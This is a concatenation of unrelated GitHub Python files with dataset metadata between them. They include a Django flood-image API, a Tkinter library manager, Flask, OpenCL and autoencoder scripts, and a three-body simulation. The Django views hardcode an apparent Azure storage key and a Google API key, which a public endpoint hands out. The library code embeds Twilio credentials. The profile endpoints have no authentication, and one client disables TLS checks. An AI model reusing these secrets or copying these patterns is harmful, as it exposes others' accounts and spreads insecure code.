ftp_proxy = "ftp://10.10.1.10:3128"
#cafile = 'FiddlerRoot.cer'
proxyDict = {
"http" : http_proxy,
"https" : https_proxy,
"ftp" : ftp_proxy
}
#print(config_FindClass.headers)
class CultSend:
def __init__(self,url=None, headers=None, type=None, payload = None):
self.url = url
self.headers = headers
self.type = type
self.payload = payload
def __prepare_session(self):
s = Session()
#params_arr = [self.type, self.url, self.headers, self.payload]
req = self.__utility_params()
print(req.url)
prepped = req.prepare()
#prepped = self.__utility_headers(prepped)
return s, prepped
def send_request(self):
s, prepped = self.__prepare_session()
print(prepped.headers)
return s.send(prepped,proxies=proxyDict,verify=False)
def __utility_headers(self, prepped):
#print(prepped.headers)
if self.type == 'GET':
del prepped.headers['Accept-Encoding']
return prepped
def __utility_params(self):
if self.type == 'GET':
return Request(self.type, self.url,headers=self.headers)
else:
print(self.payload)
return Request(self.type,self.url,data=json.dumps(self.payload), headers=self.headers)
class SendFindClass(CultSend):
def __init__(self):
url = config_FindClass.url
headers = config_FindClass.headers
type = config_FindClass.type
super().__init__(url, headers, type)
class SendBookClass(CultSend):
def __init__(self, book_id):
url =config_BookClass.url.format(book_id)
headers = config_BookClass.headers
type = config_BookClass.type
payload = config_BookClass.payload
super().__init__(url, headers, type, payload)
| akhildevelops/cult-fitness-auto-book | cult_network.py | cult_network.py | py | 2,133 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "config.FindClass",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "config.BookClass",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "requests.Request",
... |
30846787707 | # image/views.py
from rest_framework.response import Response
from rest_framework import generics, status, filters
from rest_framework.views import APIView
from django.shortcuts import get_object_or_404
from django.core.serializers.json import DjangoJSONEncoder
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseNotFound
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
import json
import os
import google_streetview.api
import random
import secrets
import base64
from .serializers import ImageSerializer, ProfileSerializer, UserSerializer
from .models import Image, Profile
#SendView: sends blob to backend and backend sends blob to azure
#ReceiveView: front end sends request for blob, backend uses request to get blob from azure and sends it to frontend
#Load: front end sends streetview info and backend saves jpg to blob
def sendToBlob(blob, blob_name):
connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
blob_service_client = BlobServiceClient.from_connection_string(connect_str)
container_client = blob_service_client.get_container_client("blupix-app")
blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=blob_name)
blob_client.upload_blob(blob)
blob_list = container_client.list_blobs()
for blob in blob_list:
print("\t" + blob.name)
class SendView(APIView):
def post(self, request):
try:
blob = request.data['file']
blob_name = request.data['blob_name']
sendToBlob(blob, blob_name)
except Exception as ex:
print('Exception:')
print(ex)
return Response({"Error": "Problem with SendView"})
return Response({"blob_name": request.data['blob_name']})
class ReceiveView(APIView):
def post(self, request):
connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
try:
blob_service_client = BlobServiceClient.from_connection_string(connect_str)
blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=request.data['blob_name'])
blob = blob_client.download_blob()
return HttpResponse(blob.readall(), content_type="image/jpeg")
except Exception as ex:
print('Exception:')
print(ex)
return Response({"Error": "Problem with ReceiveView"})
class KeyView(APIView):
def get(self, request):
return Response({"key": "AIzaSyD7blO0Y7Z-Jf2rRFyuo2CrQa7kEXRy1po"})
class LoadView(APIView):
def post(self, request):
data = request.data
params = [{
'size': data["size"], # max 640x640 pixels
'location': data["location"],
'heading': data["heading"],
'pitch': data["pitch"],
"fov": data["fov"],
'key': "AIzaSyD7blO0Y7Z-Jf2rRFyuo2CrQa7kEXRy1po"
}]
# Create a results object
results = google_streetview.api.results(params)
image_file = "media/pre_images"
results.download_links(image_file)
random.seed(secrets.token_bytes(4))
new_file_name = str(random.randint(0, 99999))
print("load: " + new_file_name)
os.rename("media/pre_images/gsv_0.jpg", "media/pre_images/" + new_file_name + ".jpg")
os.remove("media/pre_images/metadata.json")
upload_file_path = os.getcwd()+ "/" + "/media/pre_images/" + new_file_name + ".jpg"
with open(upload_file_path, "rb") as data:
encoded = base64.b64encode(data.read())
img = b'data:image/jpg;base64,' + encoded
sendToBlob(img, new_file_name)
os.remove(upload_file_path)
return Response({"blob_name": new_file_name})
class LoginView(APIView):
def get(self, request):
return Response({"Failure": "Incorrect URL"})
def post(self, request):
password = request.data["password"]
profile = None
if "username" in request.data:
username = request.data["username"]
try:
user = User.objects.get(username=username)
profile = Profile.objects.get(user=user)
except:
return Response({"Failure": "Can't find username"})
elif "phone_number" in request.data:
phone_number = request.data["phone_number"]
try:
profile = Profile.objects.get(phone_number=phone_number)
except:
return Response({"Failure": "Can't find phone_number"})
else:
return Response({"Failure": "Incorrect information sent"})
if profile.banned == True:
return Response({"Failure": "this user is banned!"})
correct_pw = profile.user.check_password(password)
if correct_pw:
prof_dict = {
"id": profile.id,
"username": profile.user.username,
"phone_number": profile.phone_number,
"is_admin": profile.is_admin,
"approved_by_admin": profile.approved_by_admin,
"banned": profile.banned
}
profiles = []
profiles.append(prof_dict)
return Response(json.loads(json.dumps(profiles, cls=DjangoJSONEncoder)))
else:
return Response({"Failure!": "Incorrect Password"})
class ProfileApproveView(generics.ListCreateAPIView):
def get(self, request): #returns all profiles not approved by admin
unapproved_profiles = Profile.objects.filter(approved_by_admin=False)
profiles = []
for p in unapproved_profiles:
prof_dict = {
"id": p.id,
"username": p.user.username,
"phone_number": p.phone_number,
"is_admin": p.is_admin,
"approved_by_admin": p.approved_by_admin,
"banned": p.banned
}
profiles.append(prof_dict)
return Response({"unapproved_profiles": json.loads(json.dumps(profiles, cls=DjangoJSONEncoder))})
class ProfileView(generics.ListCreateAPIView):
serializer_class = ProfileSerializer
queryset = Profile.objects.all()
def get(self, requset, pk=None): #used to get a list of all users
q = []
profiles = []
if pk == None:
q = self.get_queryset()
else:
q.append(get_object_or_404(Profile.objects.all(), pk=pk))
for p in q:
prof_dict = {
"id": p.id,
"username": p.user.username,
"phone_number": p.phone_number,
"is_admin": p.is_admin,
"approved_by_admin": p.approved_by_admin,
"banned": p.banned
}
print(prof_dict)
profiles.append(prof_dict)
return Response(json.loads(json.dumps(profiles, cls=DjangoJSONEncoder)))
def post(self, request): #used to create a new user
q = request.data
username = q["username"]
password = q["password"]
phone_number = q["phone_number"]
is_admin = q["is_admin"]
approved_by_admin = q["approved_by_admin"]
if User.objects.filter(username=username).exists():
return Response({"Failure!": "A user with this username already exists"})
if Profile.objects.filter(phone_number=phone_number).exists():
return Response({"Failure!": "A user with this phone_number already exists"})
profile = self.serializer_class.create_object(self,username, password, phone_number, is_admin, approved_by_admin)
return Response({"Success!": "User {} was created!".format(profile.user.username)})
def put(self, request, pk): #updated profile information
profile = get_object_or_404(Profile.objects.all(), pk=pk)
data = request.data
updated_profile = self.serializer_class.update_profile(self, profile, data)
return Response({"Success!": "User {} was updated!".format(updated_profile.user.username)}, status=204)
def delete(self, request, pk):
profile = get_object_or_404(Profile.objects.all(), pk=pk)
username = profile.user.username
profile.user.delete()
profile.delete()
return Response({"Profile for {} was deleted".format(username)}, status=204)
class ImageView(APIView):
def get(self, request, pk = None): #either returns one image (by id number) or all images
if pk == None:
images = Image.objects.all()
serializer_class = ImageSerializer(images, many = True)
else:
image = get_object_or_404(Image.objects.all(), pk=pk)
serializer_class = ImageSerializer(image, many = False)
return Response({"images": serializer_class.data})
def post(self, request):
image_serializer = ImageSerializer(data=request.data)
if image_serializer.is_valid():
image_serializer.save()
return Response(image_serializer.data, status=status.HTTP_201_CREATED)
else:
print('error', image_serializer.errors)
return Response(image_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def put(self, request, pk):
saved_image = get_object_or_404(Image.objects.all(), pk=pk)
data = request.data.get('image')
serializer_class = ImageSerializer(instance=saved_image, data=data, partial=True)
if serializer_class.is_valid(raise_exception=True):
image_saved = serializer_class.save()
return Response({"success": "Image '{}' has been updated successfully".format(image_saved)})
def delete(self, request, pk):
image = get_object_or_404(Image.objects.all(), pk=pk)
try:
blob_name = image.blob_name
connect_str = "DefaultEndpointsProtocol=https;AccountName=blupix;AccountKey=8KBz2PiH671bmhUYvjO+iAs1mh+TIx31DVgnGKzygcv8ItnRgyGtewwZkVgS7aaQ8VB6z6qY/Gqh9lTTTkrx/g==;EndpointSuffix=core.windows.net"
blob_service_client = BlobServiceClient.from_connection_string(connect_str)
blob_client = blob_service_client.get_blob_client(container="blupix-app", blob=blob_name)
blob_client.delete_blob()
except:
pass
image.delete()
return Response({"success": "Image '{}' has been updated deleted".format(pk)}, status=204)
class DataSearch(generics.ListCreateAPIView):
def createJSONObj(self, post_images):
JSONList = []
for post in post_images:
try:
#post_user = get_object_or_404(Profile, id=post.user_id_of_upload)
post_user = Profile.objects.get(id=post.user_id_of_upload)
image_dict = {
"postID" : post.id,
"post_blob_name" : post.blob_name,
"position": {
"lat" : post.latitude,
"lng" : post.longitude
},
"address" : post.address,
"floodDate" : post.flood_date,
"postSource" : post.source,
"pairAttempted" : post.pair_attempted,
"username_of_post": post_user.user.username,
"approved_user": post_user.approved_by_admin
}
except:
image_dict = {
"postID" : post.id,
"post_blob_name" : post.blob_name,
"position": {
"lat" : post.latitude,
"lng" : post.longitude
},
"address" : post.address,
"floodDate" : post.flood_date,
"postSource" : post.source,
"pairAttempted" : post.pair_attempted,
"username_of_post": "null",
"approved_user": "null"
}
try:
pre_image = Image.objects.get(id=post.pair_index)
#pre_profile = get_object_or_404(Profile, id=pre_image.user_id_of_upload)
image_dict["preID"] = pre_image.id
image_dict["pre_blob_name"] = pre_image.blob_name
image_dict["preSource"] = pre_image.source
image_dict["map_url"] = pre_image.Maps_URL
if pre_image.approved_by_admin == True:
image_dict["isPaired"] = "True"
else:
image_dict["isPaired"] = "False"
try:
pre_profile = Profile.objects.get(id=pre_image.user_id_of_upload)
image_dict["username_of_pre"] = pre_profile.user.username
except Profile.DoesNotExist:
image_dict["username_of_pre"] = "null"
except Image.DoesNotExist:
image_dict["username_of_pre"] = "null"
image_dict["predID"] = "null"
image_dict["pre_blob_name"] = "null"
image_dict["preSource"] = "null"
image_dict["isPaired"] = "False"
JSONList.append(image_dict)
return(json.loads(json.dumps(JSONList, cls=DjangoJSONEncoder)))
def get(self, request): #return all unapproved images
post_images = Image.objects.filter(pre_post = True, approved_by_admin="False")
return Response(self.createJSONObj(post_images))
def post(self, request):
q = request.data.get("data")
post_images = []
post_images = Image.objects.filter(pre_post = True, latitude__gte=q["MinLat"], latitude__lte=q["MaxLat"], longitude__gte=q["MinLong"],
longitude__lte=q["MaxLong"], flood_date__gte=q["MinDate"], flood_date__lte=q["MaxDate"])
images = []
if q["PairingStatus"] == "paired":
for p in post_images:
if p.approved_by_admin == True:
try:
pre_image = Image.objects.get(id=p.pair_index)
if pre_image.approved_by_admin == True:
images.append(p)
except:
print("problem with paired")
continue
elif q["PairingStatus"] == "unpaired":
for p in post_images:
try:
pre_image = Image.objects.get(id=p.pair_index)
if p.approved_by_admin != pre_image.approved_by_admin:
images.append(p)
except Image.DoesNotExist:
images.append(p)
continue
else:
for p in post_images:
if p.approved_by_admin == True:
images.append(p)
try:
pre_image = Image.objects.get(id=p.pair_index)
if p.approved_by_admin == False and pre_image.approved_by_admin == True:
images.append(p)
except Image.DoesNotExist:
print("You are trying to access a pre_image that does not exist")
continue
approved_user_images = []
for i in images:
try:
#profile = get_object_or_404(Profile, id=i.user_id_of_upload)
profile = Profile.objects.get(id=i.user_id_of_upload)
if profile.approved_by_admin == True:
approved_user_images.append(i)
except:
print("user doesn't exit")
continue
return Response(self.createJSONObj(approved_user_images))
| ngade98/waterlogged_heroku | waterlogged/views.py | views.py | py | 16,109 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "azure.storage.blob.BlobServiceClient.from_connection_string",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "azure.storage.blob.BlobServiceClient",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "rest_framework.views.APIView",
"line_number"... |
36060957275 | # list of registered users - pdf - full format
# list of users who availed book - name, ISBN, borrowDate and returnDate
# list of users with fine amount - name and fee pending
# send notification about the due submit and late fee - sends notification
from db_read import database
from fpdf import FPDF
from tkinter import *
from tkinter import messagebox
from twilio.rest import Client
def registered_users_list():
try:
user = database.child("Users").get().val()
pdf = FPDF()
for i in user:
pdf.add_page()
for j in user[i]:
txt = j + "->" + user[i][j]
pdf.set_font("Arial", size=15)
pdf.cell(200, 10, txt=txt, ln=1, align='L')
pdf.output("Users.pdf")
messagebox.showinfo('Success', "PDF saved Successfully")
except:
messagebox.showerror('Error', "No Users.")
def borrower():
def borrower_add():
if name.get() == "" or isbn.get() == "" or title.get() == "" or date.get() == "" or due_date.get() == "":
messagebox.showerror('Error', "All fields are required", parent=borrower_window)
else:
if (database.child("Users").child(name.get()).get().val() and database.child("Books").child(isbn.get()).get().val()) is not None:
try:
quantity = int(database.child("Books").child(isbn.get()).child("Quantity").get().val())
if quantity > 0:
database.child("Books").child(isbn.get()).update({
"Quantity": str(quantity - 1)
})
data = {
"Username": name.get(),
"ISBN": isbn.get(),
"Title": title.get(),
"Date": date.get(),
"Due Date": due_date.get()
}
database.child("BorrowerList").child(name.get()).child(isbn.get()).set(data)
messagebox.showinfo('Success', "Data Updated Successfully", parent=borrower_window)
borrower_window.destroy()
else:
messagebox.showerror('Error', "Book currently unavailable.", parent=borrower_window)
except:
messagebox.showerror('Error', "Try again later", parent=borrower_window)
borrower_window.destroy()
else:
messagebox.showerror('Error', "Invalid ISBN or User.", parent=borrower_window)
borrower_window.destroy()
borrower_window = Tk()
borrower_window.title('Add Borrower')
borrower_window.geometry('500x600')
heading = Label(borrower_window, text="Add Borrower", font=('Times New Roman', 20, 'bold'))
heading.place(x=80, y=60)
name = Label(borrower_window, text="Username :", font='Verdana 10 bold')
name.place(x=80, y=160)
isbn = Label(borrower_window, text="ISBN :", font='Verdana 10 bold')
isbn.place(x=80, y=190)
title = Label(borrower_window, text="Title :", font='Verdana 10 bold')
title.place(x=80, y=220)
date = Label(borrower_window, text="Date Borrowed:", font='Verdana 10 bold')
date.place(x=80, y=250)
due_date = Label(borrower_window, text="Due Date :", font='Verdana 10 bold')
due_date.place(x=80, y=280)
name = StringVar()
isbn = StringVar()
title = StringVar()
date = StringVar()
due_date = StringVar()
name = Entry(borrower_window, width=40, textvariable=name)
name.place(x=200, y=163)
isbn = Entry(borrower_window, width=40, textvariable=isbn)
isbn.place(x=200, y=193)
title = Entry(borrower_window, width=40, textvariable=title)
title.place(x=200, y=223)
date = Entry(borrower_window, width=40, textvariable=date)
date.place(x=200, y=253)
due_date = Entry(borrower_window, width=40, textvariable=due_date)
due_date.place(x=200, y=283)
btn_signup = Button(borrower_window, text=" Update", font=('Bookman antiqua', 12, 'bold'), command=borrower_add,
bg='#2176F2',
fg='white')
btn_signup.place(x=200, y=313)
borrower_window.bind('<Return>', lambda event: borrower_add())
borrower_window.mainloop()
def return_book():
def return_add():
if name.get() == "" or isbn.get() == "" or title.get() == "" or date.get() == "":
messagebox.showerror('Error', "All fields are required", parent=return_window)
else:
if (database.child("BorrowerList").child(name.get()).child(isbn.get()).get().val()) is not None:
try:
quantity = int(database.child("Books").child(isbn.get()).child("Quantity").get().val())
database.child("Books").child(isbn.get()).update({
"Quantity": str(quantity + 1)
})
due_amount = (database.child("DueList").child(name.get()).get().val())
amount = int(due_amount['Due Amount'])
database.child("DueList").child(name.get()).update({
"Due Amount": str(amount + int(late_fees.get()))
})
data = {
"Username": name.get(),
"ISBN": isbn.get(),
"Title": title.get(),
"Date": date.get(),
"Due amount": late_fees.get()
}
database.child("BorrowerList").child(name.get()).child(isbn.get()).remove()
database.child("ReturnerList").child(name.get()).child(isbn.get()).set(data)
messagebox.showinfo('Success', "Data Updated Successfully", parent=return_window)
return_window.destroy()
except:
messagebox.showerror('Error', "Try again later", parent=return_window)
return_window.destroy()
else:
messagebox.showerror('Error', "User haven't borrowed yet.", parent=return_window)
return_window.destroy()
return_window = Tk()
return_window.title('Return Window')
return_window.geometry('500x600')
heading = Label(return_window, text="Add Returner", font=('Times New Roman', 20, 'bold'))
heading.place(x=80, y=60)
name = Label(return_window, text="Username :", font='Verdana 10 bold')
name.place(x=80, y=160)
isbn = Label(return_window, text="ISBN :", font='Verdana 10 bold')
isbn.place(x=80, y=190)
title = Label(return_window, text="Title :", font='Verdana 10 bold')
title.place(x=80, y=220)
date = Label(return_window, text="Return Date:", font='Verdana 10 bold')
date.place(x=80, y=250)
late_fees = Label(return_window, text="Due amount :", font='Verdana 10 bold')
late_fees.place(x=80, y=280)
name = StringVar()
isbn = StringVar()
title = StringVar()
date = StringVar()
late_fees = IntVar(return_window, value=0)
name = Entry(return_window, width=40, textvariable=name)
name.place(x=200, y=163)
isbn = Entry(return_window, width=40, textvariable=isbn)
isbn.place(x=200, y=193)
title = Entry(return_window, width=40, textvariable=title)
title.place(x=200, y=223)
date = Entry(return_window, width=40, textvariable=date)
date.place(x=200, y=253)
late_fees = Entry(return_window, width=40, textvariable=late_fees)
late_fees.place(x=200, y=283)
btn_signup = Button(return_window, text=" Update", font=('Bookman antiqua', 12, 'bold'), command=return_add,
bg='#2176F2',
fg='white')
btn_signup.place(x=200, y=313)
return_window.bind('<Return>', lambda event: return_add())
return_window.mainloop()
def pdf_borrower():
try:
user = database.child("BorrowerList").get().val()
print(user)
pdf = FPDF()
for i in user:
contact = database.child("Users").child(i).child("PhoneNumber").get().val()
isbn = database.child("BorrowerList").child(i).get().val()
pdf.add_page()
pdf.set_font("Arial", size=15)
pdf.cell(200, 10, txt=f"Phone Number -> {contact}", ln=1, align='L')
for j in isbn:
for k in isbn[j]:
pdf.set_font("Arial", size=15)
pdf.cell(200, 10, txt=f"{k} -> {isbn[j][k]}", ln=1, align='L')
pdf.output("BorrowedUsers.pdf")
messagebox.showinfo('Success', "PDF saved Successfully")
except:
messagebox.showerror('Error', "No Borrowers.")
def pdf_returner():
try:
user = database.child("ReturnerList").get().val()
print(user)
pdf = FPDF()
for i in user:
contact = database.child("Users").child(i).child("PhoneNumber").get().val()
isbn = database.child("ReturnerList").child(i).get().val()
pdf.add_page()
pdf.set_font("Arial", size=15)
pdf.cell(200, 10, txt=f"Phone Number -> {contact}", ln=1, align='L')
for j in isbn:
for k in isbn[j]:
pdf.set_font("Arial", size=15)
pdf.cell(200, 10, txt=f"{k} -> {isbn[j][k]}", ln=1, align='L')
pdf.output("ReturnedUsers.pdf")
messagebox.showinfo('Success', "PDF saved Successfully")
except:
messagebox.showerror('Error', "No Returners.")
def sends_notification():
account_sid = "ACed4fd4cfe8ff5ff41c72977ac2366eb4"
auth_token = "a7dac4f9f6a0f0f74b2ed4f874d92cb8"
client = Client(account_sid, auth_token)
def sendSMS(msg, phone):
message = client.messages.create(
body=msg,
from_="+15673131780",
to="+91" + str(phone)
)
print(message.sid)
messagebox.showinfo('Success', "Message Sent Successfully")
def send_data():
if name.get() == "" or message.get() == "":
messagebox.showerror('Error', "All fields are required")
else:
try:
contact = database.child("Users").child(name.get()).child("PhoneNumber").get().val()
if contact is not None:
msg = message.get()
sendSMS(msg, contact)
else:
messagebox.showerror('Error', "No username matches the Database.", parent=send_window)
except:
messagebox.showerror('Error', "Cannot send the message right now.", parent=send_window)
finally:
send_window.destroy()
send_window = Tk()
send_window.title('Send Notifications')
send_window.geometry('500x600')
heading = Label(send_window, text="Notification Center", font=('Times New Roman', 20, 'bold'))
heading.place(x=80, y=60)
name = Label(send_window, text="Username :", font='Verdana 10 bold')
name.place(x=80, y=160)
message = Label(send_window, text="message :", font='Verdana 10 bold')
message.place(x=80, y=190)
name = StringVar()
message = StringVar()
name = Entry(send_window, width=40, textvariable=name)
name.place(x=200, y=163)
message = Entry(send_window, width=40, textvariable=message)
message.place(x=200, y=193)
btn_signup = Button(send_window, text=" Send", font=('Bookman antiqua', 12, 'bold'), command=send_data,
bg='#2176F2',
fg='white')
btn_signup.place(x=200, y=313)
send_window.bind('<Return>', lambda event: send_data())
send_window.mainloop()
| sridamul/BBMS | userManagement.py | userManagement.py | py | 11,961 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "db_read.database.child",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "db_read.database",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "fpdf.FPDF",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.... |
42412749367 | from flask import Flask, Response, jsonify
from Flask_PoolMysql import func
# 实例化flask对象
app = Flask(__name__)
app.config.from_pyfile('config.py')
class JsonResponse(Response):
@classmethod
def force_type(cls, response, environ=None):
"""这个方法只有视图函数返回非字符、非元祖、非Response对象才会调用
:param response:
:param environ:
:return:
"""
# 把字典转换成json
if isinstance(response, dict):
# jsonify将字典转换成json对象,还将该对象包装成了一个Response对象
response = jsonify(response)
return super(JsonResponse, cls).force_type(response, environ)
app.response_class = JsonResponse
# 将'/'和函数index的对应关系加到路由中
@app.route('/')
def index():
result_a = func('select * from book')
result_b = func('select subgroup,count(*) from book group by subgroup')
return {'first': result_a, 'twice': result_b}
@app.route('/get')
def get():
result = func('select s.questionid,s.level,content,answer from question r join (select questionid,level from study order by RAND() limit 15) s on r.questionid = s.questionid')
return {'topic': result}
if __name__ == '__main__':
# 监听用户请求
# 如果有用户请求到来,则执行app的__call__方法,app.__call__
app.run()
| loingjuzy/learn-flask | Flask_T1.py | Flask_T1.py | py | 1,397 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.Response",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "Flask_PoolMysql.func",
"li... |
41865132711 | from __future__ import absolute_import, print_function
import os
import numpy as np
import pyopencl as cl
os.environ['PYOPENCL_COMPILER_OUTPUT']='1'
modulepath=os.path.dirname(os.path.abspath(__file__))
class Particles(object):
def __init__(self,nparticles=1,ndim=10):
self.nparticles=nparticles
self.ndim=ndim
self.data=np.zeros(nparticles*ndim,dtype=np.float64)
class Elements(object):
value_t = np.dtype({'names' :['f64','i64','u64'],
'formats':['<f8','<i8','<u8'],
'offsets':[ 0, 0, 0],
'itemsize':8})
DriftId=1
MultipoleId=2
def __init__(self,size=40000):
self.size=size
self.data=np.zeros(size,dtype=self.value_t)
self.last=0
self.elements=[]
def add_drift(self,length=0.0):
self.elements.append(self.last)
self.data['u64'][self.last ]=self.DriftId
self.data['f64'][self.last+1]=length
self.last+=2
def add_multipole(self,knl=[],ksl=[],length=0.0,hxl=0.0,hyl=0.0):
self.elements.append(self.last)
order=max(len(knl),len(ksl))
self.data['u64'][self.last+0]=self.MultipoleId
self.data['u64'][self.last+1]=order
self.data['u64'][self.last+2]=length
self.data['u64'][self.last+3]=hxl
self.data['u64'][self.last+4]=hyl
fact=1
for nn in range(len(knl)):
self.data['f64'][self.last+5+nn*2]=knl[nn]/fact
fact*=nn+1
fact=1
for nn in range(len(ksl)):
self.data['f64'][self.last+5+nn*2+1]=ksl[nn]/fact
fact*=nn+1
self.last+=5*2*order
particles=Particles(nparticles=2560,ndim=10)
elements=Elements()
class SixTrackCL(object):
ro=cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR
rw=cl.mem_flags.READ_WRITE | cl.mem_flags.COPY_HOST_PTR
def __init__(self,particles,elements,device=["0"]):
self.particles=particles
self.elements=elements
srcpath='-I%s'%modulepath
self.ctx = cl.create_some_context(answers=device)
self.queue = cl.CommandQueue(self.ctx)
self.particles_g = cl.Buffer(self.ctx, self.rw, hostbuf=particles.data)
self.elements_g = cl.Buffer(self.ctx, self.ro, hostbuf=elements.data)
src=open(os.path.join(modulepath,'sixtracklib_cl.c')).read()
self.prg=cl.Program(self.ctx,src).build(options=[srcpath])
def track(self,nturns,elemids):
elemids=np.array(self.elemids,dtype='uint64')
elemids_g=cl.Buffer(self.ctx, self.rw, hostbuf=elemids)
nelems=np.int64(len(elem_ids))
nturns=np.int64(nturns)
self.prg.elements_track(queue,[npart],None,
self.elements_g, elemids_g, nelems,
nturns,
self.particles_g)
cl.enqueue_copy(queue,particles.data,self.particles_g)
| rdemaria/sixtracklib_gsoc18 | studies/study1/sixtracklib.py | sixtracklib.py | py | 2,937 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line... |
72806130663 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 2 17:51:41 2018
@author: USER
"""
import sys
sys.path.append('..')
import os
import torch
import torch.nn as nn
import numpy as np
import utils.general as utils
import utils.adversarial_ae as ae_utils
from adverse_AE import Adversarial_AE, Discriminator
import torchvision
import torch.optim as optim
if __name__ == '__main__':
epochs = 50
batch_size = 100
latent_dim = 2
reg = True
dataloader = utils.get_dataloader(batch_size, pad = False)
device = utils.get_device()
step_per_epoch = np.ceil(dataloader.dataset.__len__() / batch_size)
sample_dir = './samples'
checkpoint_dir = './checkpoints'
utils.makedirs(sample_dir, checkpoint_dir)
AE = Adversarial_AE(latent_dim = latent_dim).to(device)
D = Discriminator(latent_dim = latent_dim).to(device)
ae_optim = optim.Adam(AE.parameters())
d_optim = optim.Adam(D.parameters())
rec_log = []
d_log = []
rec_criterion = nn.MSELoss().to(device)
discrim_criterion = nn.BCELoss().to(device)
result = None
for epoch_i in range(1, epochs + 1):
for step_i, (img, _) in enumerate(dataloader):
N = img.shape[0]
real_label = torch.ones(N).to(device)
fake_label = torch.zeros(N).to(device)
soft_label = torch.Tensor(batch_size).uniform_(0.9, 1).to(device)
img = img.view(N, -1).to(device)
if result is None:
result = img
# Reconstruction phase
reconstructed = AE(img)
loss = rec_criterion(reconstructed, img)
ae_optim.zero_grad()
loss.backward()
ae_optim.step()
rec_log.append(loss.item())
# Discriminator phase
z = torch.randn(N, latent_dim).to(device)
code = AE.encoder(img)
fake_score = D(code)
real_score = D(z)
real_loss = discrim_criterion(real_score, soft_label)
fake_loss = discrim_criterion(fake_score, fake_label)
loss = real_loss + fake_loss
d_optim.zero_grad()
loss.backward()
d_optim.step()
d_log.append(loss.item())
code = AE.encoder(img)
fake_score = D(code)
loss = discrim_criterion(fake_score, real_label)
ae_optim.zero_grad()
loss.backward()
ae_optim.step()
utils.show_process(epoch_i, step_i + 1, step_per_epoch, rec_log, d_log)
if epoch_i == 1:
torchvision.utils.save_image(result.reshape(-1, 1, 28, 28),
os.path.join(sample_dir, 'orig.png'),
nrow = 10)
reconstructed = AE(result)
utils.save_image(reconstructed.reshape(-1, 1, 28, 28), 10, epoch_i,
step_i + 1, sample_dir)
utils.save_model(AE, ae_optim, rec_log, checkpoint_dir, 'AE.ckpt')
utils.save_model(D, d_optim, d_log, checkpoint_dir, 'D.ckpt')
ae_utils.plot_manifold(AE.encoder, device, dataloader.dataset,
dataloader.dataset.__len__(), sample_dir)
| bchao1/Fun-with-MNIST | Adversarial_Autoencoder/train.py | train.py | py | 3,559 | python | en | code | 23 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "utils.general.get_dataloader",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "utils.genera... |
12852390478 | # An implementation of the three-body problem by Logan Schmalz
# https://github.com/LoganSchmalz/threebody/
# MIT License
import numpy as np
import scipy as sci
import scipy.integrate
import scipy.linalg
import matplotlib.pyplot as plt
# As astronomers, we like to normalize values to scales that make sense
# So that's what we'll do here
# Using these norm values, we will compute some constants that make multiplying easier
# This will also speed up calculations, since we will use floating-point numbers
# as opposed to fixed point, which are slower with big differences in exponents
G = 6.67408e-11 #Newton-meters^2/kg^2, Gravitational Constant
m_norm = 1.989e30 #kg, mass of Sun
r_norm = 1.496e11 #meters, 1 AU
v_norm = 29780 #meters/sec, speed of Earth around Sun
t_norm = 1*365*24*3600 #sec, orbital period of Earth
# And here are our new constants
K1 = G * t_norm * m_norm / (r_norm**2 * v_norm)
K2 = v_norm * t_norm / r_norm
# The body_calc function takes the current conditions as an array rvs
# It returns all of the drs and dvs together, to be added to rvs by our ODE
# function and plugged back in as rvs to solve again
def body_calc(rvs, t, m1, m2, m3):
# Here we are extracting all our values from our current conditions array
r1 = rvs[ :3]
r2 = rvs[3:6]
r3 = rvs[6:9]
v1 = rvs[9:12]
v2 = rvs[12:15]
v3 = rvs[15:18]
# Getting easy access to distance values between bodies
r12 = sci.linalg.norm(r1-r2)
r23 = sci.linalg.norm(r2-r3)
r13 = sci.linalg.norm(r1-r3)
# And doing our gravity calculations with our special constants
dv1 = K1*(m2*(r2-r1)/r12**3 + m3*(r3-r1)/r13**3)
dv2 = K1*(m1*(r1-r2)/r12**3 + m3*(r3-r2)/r23**3)
dv3 = K1*(m1*(r1-r3)/r13**3 + m2*(r2-r3)/r23**3)
# And finally determining our change in position
dr1 = K2*v1
dr2 = K2*v2
dr3 = K2*v3
# Then we want to send these back to our ODE function to reuse
